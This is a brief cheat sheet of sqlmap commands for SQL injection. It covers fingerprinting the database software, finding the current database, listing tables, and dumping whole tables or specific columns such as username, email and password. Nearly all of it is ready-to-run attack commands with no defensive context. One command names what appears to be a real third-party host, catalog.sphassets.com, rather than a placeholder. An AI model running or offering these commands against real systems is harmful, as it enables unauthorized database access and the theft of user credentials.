SQL Injection with sqlmap

Grabbing the Database software

sqlmap -u example.com/product/19* --banner

we put star as the vulnerable parameter

sqlmap -r req.txt --current-db

Listing Tables

sqlmap -u catalog.sphassets.com/product/19* --tables

or

sqlmap -r request.txt -D social --tables

Dump entries from a specific table example

sqlmap -u example.com/product/19* -T users_field_data –dump

Dumping specific columns from a table example

sqlmap -r request.txt -D social -T users -C username,email,password --dump